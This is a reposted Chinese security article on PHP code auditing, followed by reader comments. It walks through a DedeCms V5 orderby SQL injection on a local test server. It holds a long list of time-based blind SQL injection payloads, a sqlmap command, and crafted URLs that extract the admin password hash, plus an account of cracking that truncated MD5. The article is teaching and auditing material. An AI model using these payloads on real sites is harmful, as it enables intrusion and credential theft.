CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

php代码

2017年5月24日 1229点热度 0人点赞 0条评论

php代码

  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

关于PHP代码审计和漏洞挖掘的一点思考

LittleHann2013-09-02共590253人围观 ,发现 22 个不明物体WEB安全

这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出。

PHP的漏洞有很大一部分是来自于程序员本身的经验不足,当然和服务器的配置有关,但那属于系统安全范畴了,我不太懂,今天我想主要谈谈关于PHP代码审计和漏洞挖掘的一些思路和理解。

PHP的漏洞发掘,其实就是web的渗透测试,和客户端的fuzzing测试一样,web的渗透测试也可以使用类似的技术,web fuzzing,即基于web的动态扫描。

这类软件国内外有很多,如WVS,Lan Guard,SSS等。这类扫描器的共同特点都是基于蜘蛛引擎对我们给出的URL地址进行遍历搜索,对得到的URL和参数进行记录,然后使用本地或者web端的script脚本攻击语句进行攻击测试。

如:

http://www.foo.com/index.php?parm1=1&parm2=2&parm3=3.....&parmn=n

WVS使用本地的脚本攻击数据库对这些参数进行交叉替换和填充,构造出新的URL,然后用GET或者POST的方式向服务器发出请求,并对返回的结果进行正则判断。如是否出现:” You have an
error in your SQL syntax”等字样。如果出现,则记录下来,说明这个脚本页面”可能”存在漏洞。

WVS把攻击分成了很多模块:

1. Blind_SQL_Injection
2. AcuSensor
3. CSRF
4. Directory_And_File_Check
5. File_Upload
6. GHDB(Google黑客数据库)
7. Sql_Injection
8. Weak_Password
9. XSS

每种攻击测试方式都对应着一类scripts,里面包含了攻击语句。

用WVS扫描完之后,如果能发现一些sql注入点的提示,这个时候可以先用sqlmap进行注入尝试,进一步判断注入点的情况。

http://hi.baidu.com/306211321/item/b4b2ea1f75db1dea9913d659

如果这两步都不能成功,说明基于fuzz的动态扫描不能继续下去了,这个时候,我们应该想办法进行静态的代码审计,从源代码的角度分析和挖掘漏洞的成因和利用方式。这块可以使用RIPS这样的软件,RIPS是一款专门用来进行静态PHP代码审计的工具,能够帮助我们定位到可能存在漏洞的代码区域。

RIPS对代码进行静态漏洞扫描的基本思想有两条:

1.       对容易产生漏洞的函数进行跟踪(例如:mysql_query())

RIPS认为,所有的注入漏洞最终都要经过一些特定的数据库操作函数,mysql_query()或程序自定义的类函数,这些函数是产生漏洞的导火索,只要对这些函数的控制流和参数流进行回溯扫描,就可以发现大部分的代码漏洞。

2.       对产生注入漏洞的源头即用户传输过来的数据流进行跟踪($_GET,$_POST,$_COOKIE)

“用户输入的一切数据都有害”,大部分的注入漏洞,包括二次注入,究其原因都是因为对用户的输入数据没有做好过滤,RIPS对这些敏感数据进行跟踪,并判断其在进入敏感函数(mysql_query())之前有没有对其进行有效处理(addslashes())来判断这条数据流是否存在漏洞。

动态扫描加上静态定位,最终使我们能更容易的发现一些漏洞并及时使其得到修补。

接下来,我们来针对一个已知的漏洞进行一次分析。

DedeCms V5 orderby参数注射漏洞

SSV-ID:3824

SSV-AppDir:织梦

URL:http://sebug.net/vuldb/ssvid-3824

1.       动态扫描

架设好服务器和网站后,我们使用WVS对网站的根目录进行扫描,因为我们现在是黑盒测试,所以直接从网站根目录开始扫描。

等待一段时间后,扫描结果出来了,得到一些疑似SQL注入的URL。这里研究一下WVS的注入测试原理是什么,通过查看apache的access.log。我们发现了一下请求(无关部分已经删除)。

id=-1&page=1
id=-1 or 1*71=71&page=1
id=-1 or 71=0&page=1
id=-1' or 5=5 or '39'='39&page=1
id=-1' or '39'='0&page=1
id=IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/&page=1
id=com_virtuemart' and sleep(2.09)='&page=1
id=com_virtuemart' and (sleep(2.09)+1) limit 1 -- &page=1
id=com_virtuemart'=sleep(2.09)='&page=1
id=com_virtuemart"=sleep(2.09)="&page=1
id=com_virtuemart'+(select 1 from (select sleep(2.09))A)+'&page=1
id=com_virtuemart and sleep(2.09) &page=1
id=com_virtuemart or (sleep(2.09)+1) limit 1 -- &page=1
id=com_virtuemart';select pg_sleep(2.09); -- &page=1
id=com_virtuemart'; waitfor delay '0:0:2.09' -- &page=1
id=com_virtuemart"; waitfor delay '0:0:2.09' -- &page=1
id=com_virtuemart&page=-1 or 1*22=22
id=com_virtuemart&page=-1 or 22=0
id=com_virtuemart&page=-1' or 5=5 or '56'='56
id=com_virtuemart&page=-1' or '56'='0
id=com_virtuemart&page=-1" or 5=5 or "39"="39
id=com_virtuemart&page=-1" or "39"="0
id=com_virtuemart&page=IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/
id=com_virtuemart&page=1 and sleep(2) 
id=com_virtuemart&page=1 or (sleep(2)+1) limit 1 -- 
id=com_virtuemart&page=1' and sleep(2)='
id=com_virtuemart&page=1' and sleep(0)='
id=com_virtuemart&page=1' and (sleep(2)+1) limit 1 -- 
id=com_virtuemart&page=1' or (sleep(2)+1) limit 1 -- 
id=com_virtuemart&page=1" or (sleep(2)+1) limit 1 -- 
id=com_virtuemart&page=1" or (sleep(0)+1) limit 1 --  
id=com_virtuemart&page=1'=sleep(2)='
id=com_virtuemart&page=1"=sleep(2)="
id=com_virtuemart&page=1'+(select 1 from (select sleep(2))A)+'
id=com_virtuemart&page=1;select pg_sleep(2); -- 
id=com_virtuemart&page=1';select pg_sleep(2); -- 
id=com_virtuemart&page=1; waitfor delay '0:0:2' -- 
id=com_virtuemart&page=1'; waitfor delay '0:0:2' -- 
id=com_virtuemart&page=1"; waitfor delay '0:0:2' -- 

可以看到,WVS采用的是一种基于时间延迟的盲注入测试技术。

http://www.4ngel.net/article/49.htm

盲注入的利用关键是要找到一个二值逻辑的判断,即需要对不同的输入有不同的返回结果,我们才能借助推理得到一些信息,但是有时候,盲注入得到的结果并不会在UI上显示出来,这样就回导致我们注入失败,但是采用时间延迟的思想就可以很好的避免这个问题,从而能够对不同的程序具有很好的适应性。

1.       注入点探测

得到WVS的扫描结果后,我们需要对可能存在注入的URL进行注意排查,以确定是否真的存在注入漏洞。

我们选取:http://192.168.174.131/index.php?option=com_virtuemart&page=1

这是dedecms的一个留言板的脚本页面:

使用sqlmap对疑似注入点进行探测:

python sqlmap.py -u "http://192.168.174.131/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=1" --current-db

扫描的结果没有成功,又手工尝试了union
selct和order by1,2,3..等注入方式,貌似不能获得盲注入的效果。

不成功的原因有很多,我自己根据经验总结了几点:

触发实际的sql注入漏洞之前要

1. 先获取cookie值(如果没有cookie值很多时候会被直接弹出到首页,没法进入到一些深层次的代码逻辑)
2. 获取formhash(防止CSRF的)
3. 对POST或GET或cookie中的某个字段进行某种编码(base64等)
4. 特殊字符(%cf宽字符)注入等
5. 结合POST或COOKIE的变量覆盖的sql注入
6. 盲注入sql语句构造的特殊性

这些先验条件有时候就会称为漏洞触发和利用的关键。

这个时候用自动化工具进行测试的工作基本做完了,我们接下来要使用RIPS来对源代码进行白盒分析,因为目标系统是开源的cms系统,我们可以很容易的从网上下载到全部源代码。

使用RIPS对cms的整站源代码进行扫描

RIPS扫描出了很多文件,有些是因为交叉引用,有些是真正存在漏洞的代码的。

我们来到:
/member/guestbook_admin.php

来分析以下代码漏洞

//重载列表
if($dopost=='getlist'){
         PrintAjaxHead();
         GetList($dsql,$pageno,$pagesize,$orderby);
         $dsql->Close();
         exit();
.........
//获得特定的关键字列表
//---------------------------------
function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){
         global $cfg_phpurl,$cfg_ml;
         $jobs = array();
         $start = ($pageno-1) * $pagesize;
 
  $dsql->SetQuery("Select * From #@__jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");
         $dsql->Execute();
  while($row = $dsql->GetArray()){
         $row['endtime'] = @ceil(($row['endtime']-$row['pubdate'])/86400);
         if($row['salaries'] == 0){
                  $row['salaries'] = '薪酬面议';
         }
    $jobs[] = $row;
   }
         foreach($jobs as $job)
         {
                   //模板文件
                   include(dirname(__FILE__)."/templets/job.htm");
         }

可以看到,代码在编写的时候,并没有对orderby这个参数进行过滤。导致了注入和畸形数据报错,接下来,我们的任务就是要利用这个漏洞进行有效的注入,获得数据。

我们手工构造一个SQL注入:

http://192.168.174.130/dedecms5.1/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=mid+and+if(ASCII(SUBSTRING((SELECT+pwd+FROM+dede_admin+where+id=1),0,1))=63,1,(SELECT+pwd+FROM+dede_member))

对应的sql语句:

Select * From dede_member_guestbook where mid='1' order by mid and if(ASCII(SUBSTRING((select pwd from dede_admin where id=1),1,1))=55,1,(select pwd from dede_member));

这样不能成功,因为sql语句的语法是这样的:

SELECT select_list
  [ INTO new_table ]
  FROM table_source
  [ WHERE search_condition ]
  [ GROUP BY group_by_expression ]
  [ HAVING search_condition ]
[ ORDER BY order_expression [ ASC | DESC ] ]

而我们在能控制的参数是order by参数,在where后面,我发现这个时候不管and逻辑的true or false都不影响sql的查询结果。

转换一下思路:

http://192.168.174.130/dedecms5.1/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=mid,if(ASCII(SUBSTRING((select+pwd+from+dede_admin+where+id=1),1,1))=54,1,(select+pwd+from+dede_member))+asc--

对应的sql语句:

Select * From dede_member_guestbook where mid='1' order by mid,if(ASCII(SUBSTRING((select pwd from dede_admin where id=1),1,1))=55,1,(select pwd from dede_member)) asc;

这个语句貌似可以利用,因为在标准的sql语法中。在order by后面再加and是没有用的。但是这里用了逗,也就是if后面的语句也属于order by的一部分了。再在最后加上一个asc,盲注入就成功了。

在+asc后面加上–注释号,来屏蔽掉后面的desc limit
0,5,整个语句就能跑通了。根据返回的结果的不一致,利用正则判断一下,就可以利用盲注入进行帐号和密码的猜测。从而获得后台权限。然后dede的密码存放机制是产生32位的MD5后,截断前24位,所以得到的hash只有24位,没法用cmd5.com直接破解。698d51a19d8a121ce581499d,去掉前8位9d8a121ce581499d转换成16位MD5,再用cmd5.com来解密,成功。

总结:

Web渗透和代码审计的第一步是对网站的fuzz测试,这可以从整体上对网站的漏洞情况进行扫描,缩小范围。

对漏洞的具体挖掘和利用还是要使用白盒分析,即源代码分析,这样才能更有效的针对不同的代码情况指定出漏洞利用方案。

介绍一些web fuzzing的工具:

Browser Fuzzer 3 (bf3) – Comprehensive Web Browser Fuzzing Tool
MantraPortable  --- OWASP的一款渗透测试套件
Webshag v1.00 – Web Server Auditing Tool (Scanner and File Fuzzer)
Wfuzz – A Tool for Bruteforcing/Fuzzing Web Applications
WVS
LAN Guard
SQLmap

刚开始接触代码审计这块,懂得不是很多,就说了一些平时玩的过程中的理解和观点,希望大神路过能多多指导指导,我会继续学习这方面的知识。

LittleHann

LittleHann10 篇文章等级: 5级
|
|
  • 上一篇:如何攻击WEB应用程序(连载一)
  • 下一篇:[技术解析]一份Archmake.COM的渗透测试报告

这些评论亮了

  • Rozero(4级)酱油桑回复
    RIPS因为是基于静态规则匹配,难免会产生较多误报,目前针对白盒审计的方法有自动化产品但都比较贵,开源的又不是那么适合每个场景,最好的办法不是依赖工具而是把工具作为辅助,针对工具产生的结果,有针对性的code review。
    @sebug,seay的代码审计工具,也是基于正则静态规则匹配,而且误报率也比较高。
    )8(亮了
  • anlfi(5级)回复
    @flowind
    你说还不是关键
    漏洞的发现除了人的坚持分析
    以外还有源于技术上的发现比如mail来执行系统命令
    bypass open_base()
    我们不用特别去针对某一个程序到底有什么漏洞
    只要关注与代码片段 与底层流程
    基于一点发展的世界 然后把一切的研究继承到软件里
    丰富规则最后你就会发现想要找一套程序漏洞是多么简单
    其他的只不过是不断机器的按某种模式和人的灵活性发现隐藏的漏洞
    假如我们能完全独立出来一套完善的系统您想会变得怎样
    )8(亮了
发表评论

已有 22 条评论

  • 直觉动物 (5级) 2013-09-02回复1楼

    只用过WVS和SQLmap

    亮了(1)
  • 河蟹 2013-09-02回复2楼

    搞那么复杂,note.exe足矣。

    亮了(4)
  • softbug (7级)011101000110100001100001011011... 2013-09-02回复3楼

    seay的那个代码审核工具可以看一下,开源了的。

    亮了(1)
  • Rozero (4级)酱油桑 2013-09-02回复4楼

    RIPS因为是基于静态规则匹配,难免会产生较多误报,目前针对白盒审计的方法有自动化产品但都比较贵,开源的又不是那么适合每个场景,最好的办法不是依赖工具而是把工具作为辅助,针对工具产生的结果,有针对性的code review。
    @sebug,seay的代码审计工具,也是基于正则静态规则匹配,而且误报率也比较高。

    亮了(8)
  • Justin (1级) 2013-09-02回复5楼

    目前公司用Fortify来审核C#代码,不是很好用~~可能也有我还没有很熟悉的原因。。呵呵
    但是貌似发现了一个Fortify本身的bug,类中override了equals和hashcode方法后,它也提示有问题,然后写了个简单例子,发现它的正则要匹配boolean,但是c#只有bool~~

    亮了(2)
  • hah 2013-09-02回复6楼

    又见大dedecms

    亮了(2)
  • 藤真 (2级)欢迎访问独自等待博客 http://www.waitalon... 2013-09-02回复7楼

    写的不错!!!

    亮了(1)
  • Jandy (1级) 2013-09-03回复8楼

    学审计代码

    亮了(1)
  • HappyQQ 2013-09-03回复9楼

    //:

    亮了(1)
  • HappyQQ 2013-09-03回复10楼

    亮了(1)
  • 太阳风 (1级) 2013-09-04回复11楼

    我擦,又见 OldHann ! :mrgreen:

    亮了(2)
  • winger (1级)放下才能高飞 2013-09-05回复12楼

    感谢分享,LZ加油

    亮了(1)
  • flowind 2013-09-28回复13楼

    通过黑盒测试缩小范围
    然后代码审计找到漏洞
    看起来很不错..实际上对于大型的开源如dz等,
    基本上黑盒找不到什么,
    通过专门的白盒测试来找,里面的逻辑很难弄清楚[程序].
    人工审计能,但是工作量太大.自己写审计工具.
    工程量实在太大了.bug还很多.如果就找找一般的漏洞,自己看看代码就好.

    亮了(3)
    • anlfi (5级) 2013-09-28回复

      @flowind
      你说还不是关键
      漏洞的发现除了人的坚持分析
      以外还有源于技术上的发现比如mail来执行系统命令
      bypass open_base()
      我们不用特别去针对某一个程序到底有什么漏洞
      只要关注与代码片段 与底层流程
      基于一点发展的世界 然后把一切的研究继承到软件里
      丰富规则最后你就会发现想要找一套程序漏洞是多么简单
      其他的只不过是不断机器的按某种模式和人的灵活性发现隐藏的漏洞
      假如我们能完全独立出来一套完善的系统您想会变得怎样

      亮了(8)
  • Tears (1级) 2013-10-24回复14楼

    很不错 学习了

    亮了(1)
  • mermalR (1级) 2013-12-23回复15楼

    大dedecms又被完爆,唉

    亮了(1)
  • tudouya (1级) 2014-12-05回复16楼

    感觉说的好专业,求交流~~能私信个QQ么

    亮了(1)
  • ted (1级) 2015-08-03回复17楼

    真心找师傅!

    亮了(1)
  • anting (3级)愿用十倍努力换成功一个 2016-05-09回复18楼

    学习了

    亮了(1)
  • 流弊的大白 2016-10-17回复19楼

    诶 很不错诶… 学习了 原来还可以这样

    亮了(0)
  • 陆小凤传奇 2017-01-07回复20楼

    @ anlfi 大妹子每次发言就像写诗一样

    亮了(0)
  • Htecne (1级) 2017-03-31回复21楼

    <css>"’

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

LittleHann

LittleHann

阿里巴巴安全工程师

10 篇文章165 条评论

相关阅读

  • PHP5.6被发现存在堆溢出漏洞
  • 易想团购系统通杀SQL注入漏洞分析及利用
  • 乐蜂网高薪招聘白盒审计以及WEB安全高级工程师
  • 基于Github的源码白盒扫描工具Raptor
  • XDCTF2015代码审计全解

特别推荐

关注我们 分享每日精选文章

不容错过

  • 隔墙有耳:黑客可以“听到”离线计算机的密钥GeekPwn2016-02-17
  • 以色列研究人员实现利用计算机风扇噪音窃听饭团君2016-06-28
  • 法网恢恢:当年的iCloud艳照门涉案黑客,现已认罪伏法米雪儿2016-03-16
  • Linux提权:从入门到放弃piece of the past2017-03-23

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月24日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me